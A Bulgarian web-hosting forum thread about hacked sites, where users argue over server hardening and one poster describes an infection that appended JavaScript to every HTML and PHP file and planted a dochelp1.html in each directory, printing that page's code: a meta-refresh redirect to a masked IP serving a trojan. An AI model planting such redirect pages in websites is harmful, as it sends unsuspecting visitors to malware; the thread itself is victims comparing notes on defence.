B
bedio
Guest
Re: Хакнати сайтове ???
fine...
fine...
SearchEngines.bg
Това е примерно съобщение за гост. Регистрирайте безплатен акаунт днес, за да станете потребител на SearchEngines.bg! След като влезете, ще можете да участвате в този сайт, като добавите свои собствени теми и публикации, както и да се свържете с други членове чрез вашата лична входяща кутия! Благодарим ви!
Хакнати сайтове ???
- Автор Kalin4y
- Начална дата
Re: Хакнати сайтове ???
Защо спорите ?! Това за което спорите е пълна глупост. sshd или ftpd имат Х секунди на забавяне при всяка n-та конекция(определя се от администратора на демона(по дефаулт разбирасе е 1-5)).Освен това има хиляди защити и логване на неуспешни un auth и етц.Поне аз така съм си ги конфнал. Друга глупост е това което bedio казва, "Единственото което има значение е че апачи има права да прави всичко." какво означава всичко. Има достъп само до ресурсите които му е дал админченцецецето. Всичко не значи www dirctory нали. Единствената защита е : опитайте всичко и пак няма да сте сигурни(правете бакъпи и постоянно). Интересното, че като направиш бакъм може още повече да се прецекаш понеже правиш бакъм с пролуката. (Извод: Ползвайте WP и въобще комерсиални аппс и се чудете защо има разни странни неща по сайта, друго: използвайте собствени проекти които нямат елементарна сигурност и това е вариант )Хайде това за добро утро малко за фън Може да ползвате и mod_security grsecurity също, т.е. защо пиша въобще имате ли си собствени машини ? Както и да е просто съм сънен явно Хайде лек и спорен ден.
Защо спорите ?! Това за което спорите е пълна глупост. sshd или ftpd имат Х секунди на забавяне при всяка n-та конекция(определя се от администратора на демона(по дефаулт разбирасе е 1-5)).Освен това има хиляди защити и логване на неуспешни un auth и етц.Поне аз така съм си ги конфнал. Друга глупост е това което bedio казва, "Единственото което има значение е че апачи има права да прави всичко." какво означава всичко. Има достъп само до ресурсите които му е дал админченцецецето. Всичко не значи www dirctory нали. Единствената защита е : опитайте всичко и пак няма да сте сигурни(правете бакъпи и постоянно). Интересното, че като направиш бакъм може още повече да се прецекаш понеже правиш бакъм с пролуката. (Извод: Ползвайте WP и въобще комерсиални аппс и се чудете защо има разни странни неща по сайта, друго: използвайте собствени проекти които нямат елементарна сигурност и това е вариант )Хайде това за добро утро малко за фън Може да ползвате и mod_security grsecurity също, т.е. защо пиша въобще имате ли си собствени машини ? Както и да е просто съм сънен явно Хайде лек и спорен ден.
Последно редактирано:
webangel78
New member
Re: Хакнати сайтове ???
При един наш проект освен подобен javascript, който беше копиран в края на всеки HTML или PHP файл, към всяка директория имаше добавен dochelp1.html който редиректва към друг хост с украинско IP на който се намира троянеца.
Това е кода на докхелпа:
<html>
<head>
<meta http-equiv="refresh" content="1;URL=http://xx.xxx.xx.xx/cgi-bin/index.cgi?user3">
</head>
<body>
</body>
</html>
Още по-интересно ми стана вчера, когато попадайки на един чужд сайт, ползващ US хостинг се оказа, че е замазан по същия начин, което донякъде ме успокоява, показвайки, че сигурността не е проблем само в BG хостинг компаниите. Притеснява ме обаче това, че явно не успяват да засекат такива разпространени атаки, въпреки, че не съм наясно дали реално могат да ги хванат и дали проблемът е само в хостинга, както си мисля аз.
При един наш проект освен подобен javascript, който беше копиран в края на всеки HTML или PHP файл, към всяка директория имаше добавен dochelp1.html който редиректва към друг хост с украинско IP на който се намира троянеца.
Това е кода на докхелпа:
<html>
<head>
<meta http-equiv="refresh" content="1;URL=http://xx.xxx.xx.xx/cgi-bin/index.cgi?user3">
</head>
<body>
</body>
</html>
Още по-интересно ми стана вчера, когато попадайки на един чужд сайт, ползващ US хостинг се оказа, че е замазан по същия начин, което донякъде ме успокоява, показвайки, че сигурността не е проблем само в BG хостинг компаниите. Притеснява ме обаче това, че явно не успяват да засекат такива разпространени атаки, въпреки, че не съм наясно дали реално могат да ги хванат и дали проблемът е само в хостинга, както си мисля аз.
B
bedio
Guest
Re: Хакнати сайтове ???
Е ти се изказа... за конекциите съм съгласен, ама за това май не го чуваш нещата много много.
Е ти се изказа... за конекциите съм съгласен, ама за това май не го чуваш нещата много много.
Последно редактирано: